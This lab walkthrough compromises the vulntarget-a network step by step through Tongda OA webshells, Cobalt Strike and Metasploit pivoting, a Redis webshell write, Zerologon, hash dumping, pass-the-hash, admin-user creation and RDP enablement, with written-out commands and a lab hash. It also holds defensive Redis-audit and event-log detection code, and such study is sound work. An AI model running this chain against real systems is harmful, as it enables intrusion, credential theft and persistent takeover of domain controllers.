[Lab Series] vulntarget-a lab walkthrough

Notes on the vulntarget lab series, used to study internal-network penetration techniques.

External-facing Win7

webshell

First, browse to the web service on the external host. It is Tongda OA; requesting /inc/expired.php shows version 11.3, which has multiple known vulnerabilities.

Use the file upload plus file inclusion vulnerabilities to get a shell, then connect to it with AntSword (蚁剑).

The command line shows that the shell already runs with SYSTEM privileges.

Checking the network configuration shows two NICs, so there is an internal network behind this host.

CS

Generate a payload.c in CS (Cobalt Strike) and use 掩日 to build an AV-evading payload from it.

Upload and run it through AntSword; the beacon checks in to CS.

After check-in, find the PID of the winlogon process and inject into it.

msf

Generate a reverse TCP payload on Kali, start a listener on the matching port, then upload and run the payload through AntSword.

This gives an msf session on the target.

Internal Win2016

redis

Upload fscan and scan the internal network. It finds another host, a Win2016, with unauthenticated Redis access (the scan also reports that the Win7 is vulnerable to MS17-010).

Use CS to open a SOCKS port on the Win7 so the internal hosts can be reached.

Connect to the Redis service on the internal host with redis-cli; the connection succeeds.

webshell

fscan also shows port 80 open; browsing to it confirms a web service.

A directory scan turns up a phpinfo page and a server probe page; either one reveals the absolute path of the web root.

Back in Redis, write a webshell into the web root.
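As an added example (not part of the lab or of this writeup), a small Python audit of a redis.conf for the conditions that make this step possible: an instance reachable over the network, without authentication, and with CONFIG still callable so that dir/dbfilename can be repointed at a web root. The two sample configs are constructed.

```python
"""Audit a redis.conf for the exposure used above: an unauthenticated instance reachable
over the network whose CONFIG command can repoint dir/dbfilename at a web root.
Added example for this writeup, not part of the lab or of Redis."""
from typing import Dict, List

LOOPBACK = {"127.0.0.1", "::1"}

def parse_redis_conf(text: str) -> Dict[str, List[str]]:
    """Map each directive to its argument strings; repeated directives are all kept."""
    conf: Dict[str, List[str]] = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments and blanks
        if not line:
            continue
        key, _, value = line.partition(" ")
        conf.setdefault(key.lower(), []).append(value.strip())
    return conf

def audit_redis_conf(text: str) -> List[str]:
    """Return the weaknesses found (empty list = hardened). Redis 6 ACL `user` lines are not evaluated."""
    conf = parse_redis_conf(text)
    findings: List[str] = []
    # No `bind` means every interface; a leading '-' marks an optional address.
    binds = [b.lstrip("-") for b in " ".join(conf.get("bind", [])).split()]
    if not binds or any(b not in LOOPBACK for b in binds):
        findings.append("bind: reachable on a non-loopback address")
    if conf.get("protected-mode", ["yes"])[-1].lower() != "yes":
        findings.append("protected-mode: disabled")
    if not any(conf.get("requirepass", [])):
        findings.append("requirepass: unset, clients connect without a password")
    renamed = {a.split()[0].upper() for a in conf.get("rename-command", []) if a.split()}
    if "CONFIG" not in renamed:
        findings.append("rename-command: CONFIG callable, dir/dbfilename can be repointed")
    return findings

# Constructed samples: the exposed shape seen in the lab, and a hardened one.
WEAK_CONF = """bind 0.0.0.0
protected-mode no
# requirepass foobared
"""
HARDENED_CONF = """bind 127.0.0.1 -::1
protected-mode yes
requirepass CHANGE-ME-strong-password-placeholder
rename-command CONFIG ""
"""

if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_redis_conf(conf) or ["no findings"])
```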

Configure a proxy in AntSword and connect to the internal Win2016.

Again the shell runs as SYSTEM, and the host is found to have no outbound Internet access.

CS

Set up a listener that uses the Win7 as a relay so the Win2016 can check in to CS.

Generate a normal exe, upload it to the Win2016 through AntSword, and run it to bring the host online.

hashdump captures a password hash.

Getting an msf session

Generate a bind TCP payload on Kali and upload it through AntSword.

In the Win7 msf session, add routes so the internal network can be reached.

meterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > use post/multi/manage/autoroute
msf6 post(multi/manage/autoroute) > set session 1
session => 1
msf6 post(multi/manage/autoroute) > run

[!] SESSION may not be compatible with this module.
[*] Running module against WIN7-PC
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.0.20.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 192.168.1.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 169.254.0.0/255.255.0.0 from Bluetooth vc6.
[*] Post module execution completed

Check the routing table and confirm that traffic for 10.0.20.0/24 is forwarded through session 1.

meterpreter > run autoroute -p

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   10.0.20.0          255.255.255.0      Session 1
   169.254.0.0        255.255.0.0        Session 1
   192.168.1.0        255.255.255.0      Session 1

Locate the domain controller's IP address and hostname.

run post/windows/gather/enum_domain

Likewise, add routes in the Win2016 session.

meterpreter > run post/multi/manage/autoroute

[!] SESSION may not be compatible with this module.
[*] Running module against WIN2016
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.0.10.0/255.255.255.0 from host's routing table.
meterpreter > run autoroute -p

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   10.0.10.0          255.255.255.0      Session 2
   10.0.20.0          255.255.255.0      Session 1
   169.254.0.0        255.255.0.0        Session 1
   192.168.1.0        255.255.255.0      Session 1

Start a SOCKS proxy on local port 1080 so the domain controller can be reached.

msf6 auxiliary(server/socks_proxy) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > options 

Module options (auxiliary/server/socks_proxy):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        Proxy password for SOCKS5 listener
   SRVHOST   0.0.0.0          yes       The address to listen on
   SRVPORT   1080             yes       The port to listen on
   USERNAME                   no        Proxy username for SOCKS5 listener
   VERSION   5                yes       The SOCKS version to use (Accepted: 4a, 5)


Auxiliary action:

   Name   Description
   ----   -----------
   Proxy  Run a SOCKS proxy server


msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 4.

[*] Starting the SOCKS proxy server

Add the proxy to proxychains

socks5 127.0.0.1 1080

Domain controller

Scan a few common ports with nmap to check that the proxy works.

CVE-2020-1472

Testing shows the DC is vulnerable to CVE-2020-1472. PoC: https://github.com/SecuraBV/CVE-2020-1472

It finally finished after ten-odd minutes.

proxychains ./zerologon_tester.py win2019 10.0.10.110

Use the exploit: https://github.com/dirkjanm/CVE-2020-1472

Set the DC password to empty

proxychains python3 cve-2020-1472-exploit.py win2019 10.0.10.110

Use impacket: https://github.com/SecureAuthCorp/impacket/

Dump the domain controller hashes

proxychains python3 examples/secretsdump.py vulntarget.com/win2019\$@10.0.10.110

This captures the administrator's hash:

aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15

Taking the domain controller

proxychains python3 examples/smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15 administrator@10.0.10.110

The shell lands directly as SYSTEM.

Because the output was garbled, re-run the command with the codec set:

proxychains python3 examples/smbexec.py -codec gbk -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15 administrator@10.0.10.110

Create a user and add it to the administrators group

C:\Windows\system32>net user xxh 123456Q@ /add
命令成功完成。


C:\Windows\system32>net localgroup administrators xxh /add
命令成功完成。
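Added example, not from the writeup: the Security-log footprint this chain leaves on the DC, as a small Python detector over constructed, simplified events. It flags a 4742 machine-account password change whose subject is ANONYMOUS LOGON (the commonly used Zerologon indicator, since the exploit step above resets the DC account over unauthenticated Netlogon), a 4720 user creation, and a 4732 addition to Administrators correlated by SID. Field names follow the Windows event schema; the SID values are constructed.

```python
"""Flag, in Security events from the DC, the footprint of the steps above: a machine-account
password reset by an anonymous caller (Zerologon), a new user (4720) and that user's SID
being added to Administrators (4732). Added example, not from the lab; the events are
constructed, simplified dicts carrying the fields those event IDs log."""
from typing import Dict, List

Event = Dict[str, str]

def detect(events: List[Event]) -> List[Dict[str, str]]:
    """Return one alert dict per suspicious event, in log order."""
    alerts: List[Dict[str, str]] = []
    created: Dict[str, str] = {}   # TargetSid -> account name, from 4720
    for e in events:
        eid, subj = e.get("EventID"), e.get("SubjectUserName", "")
        if eid == "4742" and subj.upper() == "ANONYMOUS LOGON" and e.get("TargetUserName", "").endswith("$"):
            # Machines rotate their own password (subject == target); an anonymous
            # subject means the reset arrived over an unauthenticated Netlogon call.
            alerts.append({"rule": "zerologon_reset", "account": e["TargetUserName"],
                           "host": e.get("Computer", "")})
        elif eid == "4720":
            created[e.get("TargetSid", "")] = e.get("TargetUserName", "")
            alerts.append({"rule": "user_created", "account": e.get("TargetUserName", ""),
                           "by": subj})
        elif eid == "4732" and e.get("TargetUserName", "").lower() == "administrators":
            # 4732 frequently logs MemberName as "-", so correlate on the SID instead.
            sid = e.get("MemberSid", "")
            alerts.append({"rule": "admin_group_add", "member": created.get(sid, sid),
                           "new_account": str(sid in created)})
    return alerts

# Constructed sample: a routine machine password change (benign), then the chain above.
SAMPLE_EVENTS: List[Event] = [
    {"EventID": "4742", "Computer": "WIN2019", "SubjectUserName": "WIN2019$", "TargetUserName": "WIN2019$"},
    {"EventID": "4742", "Computer": "WIN2019", "SubjectUserName": "ANONYMOUS LOGON", "TargetUserName": "WIN2019$"},
    {"EventID": "4624", "Computer": "WIN2019", "SubjectUserName": "-", "TargetUserName": "Administrator"},
    {"EventID": "4720", "Computer": "WIN2019", "SubjectUserName": "WIN2019$", "TargetUserName": "xxh",
     "TargetSid": "S-1-5-21-0-0-0-1105"},
    {"EventID": "4732", "Computer": "WIN2019", "SubjectUserName": "WIN2019$", "TargetUserName": "Administrators",
     "MemberName": "-", "MemberSid": "S-1-5-21-0-0-0-1105"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```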

Enable Remote Desktop

reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

Connecting with rdesktop fails with the following error.

Connect with remmina instead

apt install remmina
proxychains remmina

Enter the IP address and the account credentials, and the login succeeds.